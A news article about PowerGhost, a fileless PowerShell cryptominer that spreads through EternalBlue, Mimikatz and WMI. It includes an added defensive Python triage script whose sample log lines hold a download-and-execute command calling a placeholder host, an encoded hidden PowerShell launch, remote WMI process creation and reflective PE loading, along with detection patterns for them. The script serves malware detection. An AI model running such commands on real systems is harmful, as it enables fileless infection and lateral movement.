Cyber-criminals are distributing a newly discovered PowerShell-based malware program that spreads cryptomining software across infected businesses' local area networks using various fileless techniques, including the EternalBlue exploit.
Dubbed PowerGhost, the malware "is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers," warns a 26 July blog post from Kaspersky Lab, whose researchers uncovered the threat.
According to post co-authors and researchers Vladas Bulavas and Anatoly Kazantsev, the actors behind this campaign use exploits or remote administration tools to initially infect targets with the obfuscated, single-line PowerShell script. At that point, the script immediately downloads and executes the miner without writing it to the hard drive, launching the software by loading a PE file via reflective PE injection.
The modular PowerGhost script propagates itself across networks by leveraging the EternalBlue remote code execution exploit, as well as by using the password extraction tool Mimikatz to grab user account credentials from infected machines. These credentials are then used to log on to additional machines, where the script launches a copy of itself via WMI (Windows Management Instrumentation).
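As an added defensive example (not code from the Kaspersky post), the following Python triage script scores PowerShell log lines against the behaviours described above: encoded hidden-window one-liners, in-memory download-and-execute, reflective PE loading, and remote process creation via WMI. The log lines, host name and URL are constructed placeholders, not real telemetry.

```python
import re

# Constructed sample PowerShell script-block / process-creation log lines (not real telemetry).
# The host name, URL and encoded blob are placeholders.
SAMPLE_LOGS = [
    "powershell.exe -nop -w hidden -ep bypass -enc <BASE64_PLACEHOLDER>",
    "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a.ps1')",
    "Invoke-WmiMethod -Class Win32_Process -Name Create -ComputerName FILESRV01 "
    "-ArgumentList 'powershell -nop -w hidden -enc <BASE64_PLACEHOLDER>'",
    "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object",
    "Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $pid",
]

# Each rule: (name, weight, regex). Weights reflect how strongly a pattern indicates the
# fileless download-and-execute or WMI lateral-movement behaviour described in the article.
RULES = [
    ("encoded_command", 2, re.compile(r"-(enc|encodedcommand)\b", re.I)),
    ("hidden_window", 1, re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("exec_policy_bypass", 1, re.compile(r"-(ep|executionpolicy)\s+bypass", re.I)),
    ("download_string", 2, re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I)),
    ("invoke_expression", 2, re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("reflective_load", 3, re.compile(r"ReflectivePEInjection|\[Reflection\.Assembly\]::Load", re.I)),
    ("wmi_remote_exec", 3, re.compile(
        r"Invoke-WmiMethod.*Win32_Process.*-ComputerName|Invoke-CimMethod.*Win32_Process", re.I | re.S)),
]


def score_line(line):
    """Return (score, [rule names]) for one log line; several weak hits add up."""
    hits = [name for name, _, rx in RULES if rx.search(line)]
    score = sum(w for name, w, _ in RULES if name in hits)
    return score, hits


def triage(lines, threshold=3):
    """Return (line, score, hits) for lines scoring at or above threshold, highest first."""
    flagged = []
    for line in lines:
        score, hits = score_line(line)
        if score >= threshold:
            flagged.append((line, score, hits))
    return sorted(flagged, key=lambda t: t[1], reverse=True)


if __name__ == "__main__":
    for line, score, hits in triage(SAMPLE_LOGS):
        print(f"[{score}] {', '.join(hits)} :: {line[:70]}")
```

The combined score matters more than any single rule: a benign administrative command rarely pairs an encoded hidden-window launch with remote WMI process creation, so the WMI line ranks highest here.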
When it does successfully land on a new network machine, PowerGhost next tries to escalate its privileges using multiple Microsoft Windows exploits.
So far PowerGhost sightings have been most frequent in India, Brazil, Colombia and Turkey, reports Kaspersky, whose researchers even found one version of the script that included a DDoS tool component.